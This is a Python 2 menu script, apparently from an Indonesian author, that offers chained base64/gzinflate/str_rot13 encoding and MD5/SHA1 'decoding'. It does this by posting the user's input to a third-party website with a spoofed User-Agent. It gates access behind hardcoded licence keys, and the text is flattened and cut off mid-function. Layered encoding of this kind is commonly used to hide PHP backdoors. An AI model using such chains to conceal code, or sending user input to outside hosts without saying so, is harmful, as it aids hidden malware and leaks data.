print '\x1b[32m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\x1b[32m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\x1b[32m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97\x1b[32m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\x1b[32m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97 \x1b[32m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x94\xe2\x95\x9d'
print '\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d \x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97'
print '\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91 \x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91 \x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\x1b[32m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91 \x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\x1b[32m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91 \x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91'
print '\x1b[31m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d'
print ' \x1b[31m[\x1b[37mAuthor\x1b[31m]=[ \x1b[36mRizky ID'
print ' \x1b[31m[\x1b[37mCreate\x1b[31m]=[ \x1b[36m8 April 2020'
print ' \x1b[31m[\x1b[37mFungsi\x1b[31m]=[ \x1b[36mEncrypt/Decrypt'
print '\x1b[37m==============================================='
ban = '\n\x1b[37m{\x1b[31m01\x1b[37m} \x1b[32mURL\n\x1b[37m{\x1b[31m02\x1b[37m} \x1b[32mBASE64\n\x1b[37m{\x1b[31m03\x1b[37m} \x1b[32mCONFERT_UU\n\x1b[37m{\x1b[31m04\x1b[37m} \x1b[32mJSON\n\x1b[37m{\x1b[31m05\x1b[37m} \x1b[32mGZINFLATE - BASE64\n\x1b[37m{\x1b[31m06\x1b[37m} \x1b[32mSTR_ROT13 - BASE64\n\x1b[37m{\x1b[31m07\x1b[37m} \x1b[32mSTR_ROT13 - GZINFLATE - BASE64\n\x1b[37m{\x1b[31m08\x1b[37m} \x1b[32mGZINFLATE - STR_ROT13 - BASE64\n\x1b[37m{\x1b[31m09\x1b[37m} \x1b[32mGZINFLATE - STR_ROT13 - GZINFLATE - BASE64\n\x1b[37m{\x1b[31m10\x1b[37m} \x1b[32mSTR_ROT13 - CONVERT_UU - URL - GZINFLATE -\n\x1b[37m \x1b[32mSTR_ROT13 - BASE64 - CONVERT_UU - GZINFLATE -\n \x1b[37m \x1b[32mURL - STR_ROT13 - GZINFLATE - BASE64\n\x1b[37m{\x1b[31m11\x1b[37m} \x1b[32mSTR_ROT13 - GZINFLATE - STR_ROT13 - BASE64\n\x1b[37m{\x1b[31m12\x1b[37m} \x1b[32mBASE64 - GZINFLATE - STR_ROT13 - CONVERT_UU -\n \x1b[37m \x1b[32mGZINFLATE - BASE64\n\x1b[37m{\x1b[31m13\x1b[37m} \x1b[32mHEX ENCODE-DECODE\n\x1b[37m{\x1b[31m14\x1b[37m} \x1b[32mMD5 HASH\n\x1b[37m{\x1b[31m15\x1b[37m} \x1b[32mSHA1 HASH\n\x1b[37m{\x1b[31m16\x1b[37m} \x1b[32mROT13 HASH\n\x1b[37m{\x1b[31m17\x1b[37m} \x1b[32mSTRLEN\n\x1b[37m{\x1b[31m18\x1b[37m} \x1b[32mUNESCAPE\n\x1b[37m{\x1b[31m19\x1b[37m} \x1b[32mCHAR AT\n\x1b[37m{\x1b[31m20\x1b[37m} \x1b[32mCHR - BIN2HEX - SUBSTR\n\x1b[37m{\x1b[31m21\x1b[37m} \x1b[32mCHR\n\x1b[37m{\x1b[31m22\x1b[37m} \x1b[32mHTMLSPECIALCHARS\n\x1b[37m{\x1b[31m23\x1b[37m} \x1b[32mESCAPE\n\x1b[37m{\x1b[31m24\x1b[37m} \x1b[32mAUTO HASH\n\x1b[37m===============================================\n\x1b[31m[\x1b[37mC\x1b[31m]=[ \x1b[35mCHAT ADMIN\n\x1b[31m[\x1b[37mF\x1b[31m]=[ \x1b[35mFOLLOW ADMIN\n\x1b[31m[\x1b[37mE\x1b[31m]=[ \x1b[31mEXIT PROGRAM\n\x1b[37m===============================================\n'
def main():
os.system('clear')
main1()
print ban
pilih = raw_input('%s >>>>%s ' % (biru, hijau))
if pilih == '1' or pilih == '01':
e1()
elif pilih == '2' or pilih == '02':
e2()
elif pilih == '3' or pilih == '03':
e3()
elif pilih == '4' or pilih == '04':
e4()
elif pilih == '5' or pilih == '05':
e5()
elif pilih == '6' or pilih == '06':
e6()
elif pilih == '7' or pilih == '07':
e7()
elif pilih == '8' or pilih == '08':
e8()
elif pilih == '9' or pilih == '09':
e9()
elif pilih == '10':
e10()
elif pilih == '11':
e11()
elif pilih == '12':
e12()
elif pilih == '13':
e13()
elif pilih == '14':
e14()
elif pilih == '15':
e15()
elif pilih == '16':
e16()
elif pilih == '17':
e17()
elif pilih == '18':
e18()
elif pilih == '19':
e19()
elif pilih == '20':
e20()
elif pilih == '21':
e21()
elif pilih == '22':
e22()
elif pilih == '23':
e23()
elif pilih == '24':
auto()
elif pilih == 'C' or pilih == 'c':
print
chat = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mIsi pesan mu : ')
chat.replace(' ', '%20')
spin()
sp.check_output(['am', 'start', 'https://api.whatsapp.com/send?phone=6288261764938&text=HASHER : ' + chat + ''])
main()
elif pilih == 'F' or pilih == 'f':
os.system('xdg-open https://www.instagram.com/riski_1504')
sys.exit()
elif pilih == 'E' or pilih == 'e':
print '%s(%s!%s) %sKeluar' % (putih, merah, putih, merah)
sys.exit()
def muat():
m = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100']
print
for b in m:
sys.stdout.write('\r' + putih + '[' + cyan + '#' + putih + ']' + putih + ' Sedang Menghubungkan' + merah + ' [' + hijau + b + putih + '%' + merah + ']')
sys.stdout.flush()
time.sleep(0.1)
time.sleep(0.1)
def pilih():
os.system('clear')
print licen
mana = raw_input('\n%s(%s!%s)%s Masukan License%s :%s ' % (putih, merah, putih, putih, merah, hijau))
if mana == '':
print '%s(%s!%s)%s Jangan Kosong' % (putih, merah, putih, merah)
pilih()
elif mana in ('mikuna5bq2kuu', 'Abogabegaefi1y3'):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('pinajquaqjuabb', 'macet52aaremkunek'):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('kahwbwbana77ahwg', 'piquennadrakqma147aa'):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('ajagagahahavqgayag', 'jakamwnabagajuquaiw9'):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('aiqiqnabah181jq17', 'hahquw72j18qjq8q'):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('jahafw71816262baha5', 'jajwhqha618191gwgw6j'):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('jauwiw816w5wywhwbwgqu', 'jayayqiqkqbagauqj'):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('quqiaha8172baiq9', 'kauqiqnaba17q9qb'):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('riski_1504instagram', 'rizkyganz1504kahquah'):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('iakwajaahwggwhaa817oqja', 'facebookrizkyid111'):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('===bwjabase64ajaagja', 'baagbav-base64baf=='):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('mueheheheeh525y2qgqh', 'makanyajangangoblokxxx'):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('ahyauqhwha6w8qhagagi', 'aajaba7w52uabw8wh'):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('A', 'a'):
print
chat = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mIsi pesan mu : ')
chat.replace(' ', '%20')
spin()
sp.check_output(['am', 'start', 'https://api.whatsapp.com/send?phone=6288261764938&text=HASHER : ' + chat + ''])
main()
else:
muat()
print '\n %s>>>>>%s License Wrong%s <<<<<' % (biru, merah, biru)
time.sleep(2)
pilih()
def enc(hash, tp, tipe):
spin()
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
dat = {'mbutt': hash, 'ope': tp, 'submit': tipe}
a = requests.post('http://tools-ixid.ga/enc-dec.php', headers={'User-Agent': '{acak}'}, data=dat)
b = bs(a.content, 'html.parser')
c = b.find_all('textarea')[1]
d = c.text
print '\n\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult : ' + d
print
raw_input('\n\x1b[32m [ \x1b[31menter to back menu \x1b[32m] ')
main()
def dec(hash, tp, tipe):
spin()
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
dat = {'mbutt': hash, 'ope': tp, 'crack': tipe}
a = requests.post('http://tools-ixid.ga/enc-dec.php', headers={'User-Agent': '{acak}'}, data=dat)
b = bs(a.content, 'html.parser')
c = b.find_all('textarea')[1]
d = c.text
print '\n\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult : ' + d
print
raw_input('\n\x1b[32m [ \x1b[31menter to back menu \x1b[32m] ')
main()
def e1():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e1()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e1()
tp = 'urlencode'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e1()
tp = 'urlencode'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e1()
def e2():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e2()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e2()
tp = 'base64'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e2()
tp = 'base64'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e2()
def e3():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e3()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e3()
tp = 'ur'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e3()
tp = 'ur'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e3()
def e4():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e4()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e4()
tp = 'json'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e4()
tp = 'json'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e4()
def e5():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e5()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e5()
tp = 'gzinflates'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e5()
tp = 'gzinflates'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e5()
def e6():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e6()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e6()
tp = 'str2'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e6()
tp = 'str2'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e6()
def e7():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e7()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e7()
tp = 'gzinflate'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e7()
tp = 'gzinflate'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e7()
def e8():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e8()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e8()
tp = 'gzinflater'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e8()
tp = 'gzinflater'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e8()
def e9():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e9()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e9()
tp = 'gzinflatex'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e9()
tp = 'gzinflatesx'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e9()
def e10():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e10()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e10()
tp = 'gzinflatew'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e10()
tp = 'gzinflatew'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e10()
def e11():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e11()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e11()
tp = 'str'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e11()
tp = 'str'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e11()
def e12():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e12()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e12()
tp = 'url'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e12()
tp = 'url'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e12()
def e13():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e13()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e13()
tp = 'hexencode'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e13()
tp = 'hexencode'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e13()
def e14():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e14()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e14()
tp = 'md5'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e14()
tp = 'md5'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e14()
def e15():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e15()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e15()
tp = 'sha1'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e15()
tp = 'sha1'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e15()
def e16():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e16()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e16()
tp = 'str_rot13'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e16()
tp = 'str_rot13'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e16()
def e17():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e17()
